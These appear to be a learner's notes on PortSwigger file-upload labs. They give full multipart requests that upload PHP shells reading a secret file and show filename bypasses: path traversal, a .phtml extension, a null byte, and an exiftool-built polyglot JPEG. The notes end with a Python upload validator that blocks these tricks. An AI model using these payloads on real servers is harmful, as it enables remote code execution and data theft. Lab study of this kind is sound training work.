File Upload Labs Overview
File Upload
Current Lab
https://portswigger.net/web-security/file-upload/lab-file-upload-web-shell-upload-via-race-condition
Stuck on this one. I may have to send requests in bulk (via a script or Intruder) to exploit the race condition.
Completed Labs
Request is:
POST /my-account/avatar HTTP/1.1
Host: ac001ff71f84373ec0250aad009900f6.web-security-academy.net
Cookie: session=oNfNC6EV6EeWRhPFR20s8YFSNB1vhCIY
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://ac001ff71f84373ec0250aad009900f6.web-security-academy.net/my-account
Content-Type: multipart/form-data; boundary=---------------------------54678472011940128371129110003
Content-Length: 580
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close
-----------------------------54678472011940128371129110003
Content-Disposition: form-data; name="avatar"; filename="index.php"
Content-Type: text/plain
<?php
$path = "/home/carlos/secret";
$fileContent = file_get_contents($path);
echo $fileContent;
?>
-----------------------------54678472011940128371129110003
Content-Disposition: form-data; name="user"
wiener
-----------------------------54678472011940128371129110003
Content-Disposition: form-data; name="csrf"
CyWcDOIewMR1vVCz9Z5SyAIUvX635o7I
-----------------------------54678472011940128371129110003--

The request is the same as before; here we don't change the Content-Type and we just upload a file with a php extension.
Response
- Lab https://portswigger.net/web-security/file-upload/lab-file-upload-web-shell-upload-via-path-traversal
Request is:
POST /my-account/avatar HTTP/1.1
Host: ac741f831fb332fcc08fcbde003e00fb.web-security-academy.net
Cookie: session=0foxB7Zs6s6U7kHmBeP4q6Je9t7CNn4R
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://ac741f831fb332fcc08fcbde003e00fb.web-security-academy.net/my-account
Content-Type: multipart/form-data; boundary=---------------------------16141849379546297572049735286
Content-Length: 582
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close
-----------------------------16141849379546297572049735286
Content-Disposition: form-data; name="avatar"; filename="..%2f62.php"
Content-Type: image/jpeg
<?php
$path = "/home/carlos/secret";
$fileContent = file_get_contents($path);
echo $fileContent;
?>
-----------------------------16141849379546297572049735286
Content-Disposition: form-data; name="user"
wiener
-----------------------------16141849379546297572049735286
Content-Disposition: form-data; name="csrf"
o9jIgJxyGwddrZnTAle7fiiafGj20cEu
-----------------------------16141849379546297572049735286--
Response is:
HTTP/1.1 200 OK
Date: Tue, 14 Dec 2021 04:55:05 GMT
Server: Apache/2.4.29 (Ubuntu)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 132
The file avatars/../62.php has been uploaded.<p><a href="/my-account" title="Return to previous page">« Back to My Account</a></p>
File content is:
The php file extension is blacklisted, so I used phtml (from this site).
The most important part of the request is below:
Content-Disposition: form-data; name="avatar"; filename="p.phtml"
Content-Type: image/jpeg
<?php
$path = "/home/carlos/secret";
$fileContent = file_get_contents($path);
echo $fileContent;
?>
The file gets uploaded easily, and the result is:
The backend only accepts files with a png or jpg extension, so we can't upload a file ending in php. Hence we used a null byte so that the jpg extension is ignored: the extension check sees .jpg, but the filesystem call stops at the null byte and writes p.php. The filename is p.php%00.jpg.
Request is:
Content-Disposition: form-data; name="avatar"; filename="p.php%00.jpg"
Content-Type: image/jpeg
<?php
$path = "/home/carlos/secret";
$fileContent = file_get_contents($path);
echo $fileContent;
?>
Here the backend reads the incoming file and checks whether it is a valid JPEG or PNG.
- We used exiftool to add PHP code to a JPEG file's Comment field:
./exiftool -Comment='<?php $path = "/home/carlos/secret"; $fileContent = file_get_contents($path); echo $fileContent; echo "hey wassup" ?>' ../test.jpg
- Then we uploaded the file as test.php
- Now when we go to files/avatars/test.php we see the following response:
Here it is hard to find our required output. I put "hey wassup" in so that I could search for it, but the browser is not searching. Eventually I was able to find it.
The secret key is M2eMeYXz2bsSAEfwRNsLim3vILBtloiY and not wM.... I had to submit it multiple times until I got the correct one. Maybe add a known string like hey wassup before and after the required value.
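As an added example (not code from the labs or from this page), here is a server-side avatar upload check that rejects every filename trick used in the labs above: the URL-encoded traversal `..%2f62.php`, the blacklist bypass `p.phtml`, the null byte in `p.php%00.jpg`, and PHP source declared as image/jpeg. Python is used here instead of the labs' PHP, and the magic-byte table, the server-generated stored name and the assumption that the avatars directory is served without a script handler are mine; it also shows why the exiftool polyglot still needs that last assumption, since a genuine JPEG carrying PHP in a comment passes content sniffing.

```python
import secrets
from urllib.parse import unquote

# Allowlisted extensions and the magic bytes a genuine file of that type starts with
# (assumed table for this example; real deployments should use a full sniffer).
MAGIC = {"png": b"\x89PNG\r\n\x1a\n", "jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff"}


def check_avatar_upload(filename: str, content: bytes) -> dict:
    """Return {"ok": True, "stored_as": name} or {"ok": False, "reason": why}.

    Both the submitted filename and the multipart Content-Type are attacker-controlled,
    so neither is trusted: Content-Type is ignored entirely, the filename only selects
    an allowlisted extension, and the bytes are sniffed. Run this before anything is
    written under the web root, so there is no window in which an unchecked file is
    reachable (the race-condition lab abuses exactly that window)."""
    name = unquote(filename)                      # "..%2f62.php" -> "../62.php"
    if "\x00" in name:                            # p.php%00.jpg
        return {"ok": False, "reason": "null byte in filename"}
    if "/" in name or "\\" in name or name in ("", ".", ".."):   # ../62.php
        return {"ok": False, "reason": "path separator in filename"}
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    if ext not in MAGIC:                          # index.php, p.phtml, test.php
        return {"ok": False, "reason": f"extension {ext!r} not allowlisted"}
    if not content.startswith(MAGIC[ext]):        # PHP source uploaded as .jpg
        return {"ok": False, "reason": "content does not match extension"}
    # A real JPEG with PHP in its Comment tag passes the check above, so the stored
    # name never derives from user input, and the avatars directory must be served
    # as static files with no PHP handler so that the comment is never executed.
    return {"ok": True, "stored_as": f"{secrets.token_hex(16)}.{ext}"}


# Constructed sample inputs mirroring the lab payloads (not real uploads).
PHP_SOURCE = b"<?php echo 'x'; ?>"
JPEG_WITH_COMMENT = b"\xff\xd8\xff\xe0" + b"\x00\x10JFIF" + b"<?php echo 'x'; ?>"
```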